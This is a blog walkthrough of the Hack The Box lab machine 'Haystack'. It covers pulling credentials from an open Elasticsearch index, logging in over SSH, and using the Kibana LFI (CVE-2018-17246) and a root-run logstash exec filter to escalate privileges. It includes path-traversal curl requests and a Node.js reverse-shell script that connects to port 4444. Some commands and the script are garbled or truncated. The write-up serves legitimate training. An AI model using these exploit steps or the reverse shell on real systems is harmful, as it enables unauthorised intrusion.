Haystack – hackthebox.eu walkthrough

This is a walkthrough on the machine called Haystack on hackthebox.eu, which most users found frustrating and/or annoying. Personally I would describe it more as a kind of annoying box, and although rated as easy my personal opinion is at least the Privilege Escalation part should be falling a bit more into the intermediate category. cat >> /etc/hosts <<<“ haystack.htb”

Enumeration and Running Services

nmap -sC -sV --reason --top-ports 10000 haystack.htb
Scanning the top ten thousand ports of the machine reveals a ssh service on port 22, web server (nginx) on port 80, and an additional web server (nginx) on port 9200 with the interesting “DELETE” method enabled. The ssh banner responds with a string of “SSH-2.0-OpenSSH_7.4” so the exact OS Version on the box could hardly be enumerated precisely, but one thing to notice here is this particular version of the openssh package is susceptible to ssh username enumeration attacks [exploit] Going further the box reveals an image on the web server on port 80: Looks like a CTF box, and having a single picture with a needle in a haystack on the front page or having any single non-sense picture at all on the front page, usually means there is either some hidden information within its metadata or it could be used for a reverse image search. In this case it’s the case of a hidden hint within its metadata: Reviewing the image code using the “strings” application shows a base64 string at the end, end decoding it translates to a hint written in Spanish: According to google translate, la aguja en el pajar es “clave” = the needle in the haystack is “key” In addition to this, the web server on port 80 seems to the elasticsearch API, which is part of the ELK Stack:
elasticsearch – ELK Stack – haystack.htb:9200

Exfiltration of data

From this point you could either use dirbuster/gobuster, or take a more technical or smarter approach and show all indices of elasticsearch. This is something that you should either know preliminary, or otherwise it requires some research within the elasticsearch documentation and on the ELK stack overall.
How to show all indices on elasticsearch (ELK Stack)
So what we have is three indexes: .kibana, quotes, and bank. An additional point of research here to be noted is that by just requesting the /quotes index within the elasticsearch API wouldn’t show all the records, which was one of the box traps. In order to show the full list of records and values within elasticsearch, you have to specifically tell this to the server using the size parameter, which I found out about from the following stackoverflow comment: https://stackoverflow.com/a/32832160 So to get the top 1000 records of the quotes database, you have to make the following query: http://haystack.htb:9200/quotes/_search?size=1000 An alternative, a bit more messed up to research way to this would be to search within all indices and pass the size variable: http://haystack.htb:9200/_search?size=1000 In order to filter all this and to avoid going through all the quotes I filtered them through jq and then used GNU grep to search for “key” or “clave”:
curl -sL http://haystack.htb:9200/quotes/_search?size=1000 | jq '.' | grep 'key\|clave'
So what we have now is two base64 values, which were within quotes containing the term “clave”, which translates to “key” from spanish. Let’s see what they decode to:
elasticsearch data exfiltration: user: security pass: spanish.is.key
which leads to our

Remote Code Execution / SSH shell

And those are the credential for RCE, as trying to login via SSH using the exfiltrated from elasticsearch credentials:
Getting a shell on target “haystack” – hackthebox.eu walkthrough – d7x – PromiseLabs blog
A regular user with uid and gid 1000 with no sudo privileges.

Privilege Escalation

Here’s the second trap on the box: enumerating the system in details shows that there is the kibana service user and group within /etc/passwd and /etc/group: And as the netstat command is missing on the server (which seemed suspicious), these are the following

Alternative ways to show listening ports to netstat

ss -nptl # or ss -nutl for UDP
cat /proc/net/netstat
lsof -i
What we can see here is the kibana service running locally on port 5601: *  The other way to enumerate the port kibana is running on is looking at its configuration file at /etc/kibana/kibana.yml Running curl indeed shows the kibana service running on localhost: As logstash is running as root, and the logstash daemon allows for command execution using the Exec input plugin , we are aiming to get access to the /etc/logstash/conf.d directory, which belongs to the root user and to the kibana group: The first thing we have to do is get access to the kibana user. Then, use the grok Exec input filter and alter the logstash configuration to execute a command with elevated privileges.  The kibana service is prone to a Kibana Local File Inclusion, described in CVE-2018-17246, originally authored by CyberArk as “A Local File Inclusion in Kibana allows attackers to run local JavaScript files” Following the above article, it’s a bit of a trial and error to go on from here. My initial test as a lower enumerator was to create a script just creating a file in the /tmp directory. I found something specific while working on this box, which was not quite explained within CyberArk’s article, and I am not sure whether it’s the box that works this way for some unknown reason, or it’s actually intended to trigger it. In order to bring the LFI to execution you first have to actually query the cli.js using the following command:
curl "http://localhost:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=./../../cli_plugin/cli.js"
The service may get unresponsive/broken after a few tries and instead you do not get a shell you have to request the cli.js plugin again, and then call for your shell (it may require several tries until you get the “No response from server” response (and in case you mess up something, you may need to revert the box and go again, so be careful – another thing I found out in addition to this is that you have to wait a while after a revert and check whether the kibana service has actually started by just checking out the kibana service using curl:
curl http://localhost:5601
If you get no response, you have to wait more (may take up to 5 minutes, so be patient). Here is the code of the .js shell, as well as changing its permissions to be executed globally:
cat > /tmp/shell.js

var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/bash", []);
var client = new net.Socket();
client.connect(4444, "", function(){
return /a/;


chmod 777 /tmp/shell.js
My methodology was as following:
  1. Check whether kibana service has started: curl http://localhost:5601 If you do not get a response, you need to wait more. If you get some javascript code looking as following:
    [security@haystack ~]$ curl http://localhost:5601
    <script>var hashRoute = '/app/kibana';
    var defaultRoute = '/app/kibana';
    var hash = window.location.hash;
    if (hash.length) {
    window.location = hashRoute + hash;
    } else {
    window.location = defaultRoute;
    Then you are good to go;
  2. curl “http://localhost:5601/api/console/api_server[10/1869] 40SENSE_VERSION&apis=../../../cli_plugin/cli”Try this several times until you get the following response: curl: (52) Empty reply from server
  3. curl “http://localhost:5601/api/console/api_server?sense_version=%40% 40SENSE_VERSION&apis=../../../../../../../../tmp/shell.js”You may get a “connection refused” response. Try several times and wait a few seconds between attempts until you get a shell:
    Privilege Escalation on “haystack” phase 1 – getting a shell using kibana’s service privileges
    Now we are able to modify logstash configuration:
logstash configuration: filter.conf
logstash configuration: input.conf and output.conf
What this means is when the grok filter matches the pattern “Ejecutar\s*comando\s*: \s+%{GREEDYDATA:comando}” within a file named /opt/kibana/logstash_* (meaning the star could be replaced with anything), it will execute the command provided with the privileges of the logstash daemon running. So now all we have to do is create a file named /opt/kibana/logstash_0 (for example), and wait for the result. As a lower enumerator the first thing I tried was copying the /etc/passwd in the /tmp directory instead of trying to get a shell directly, which I will skip in this post to keep the information consistent.
Getting root on haystack – d7x – PromiseLabs blog – hackthebox.eu walkthrough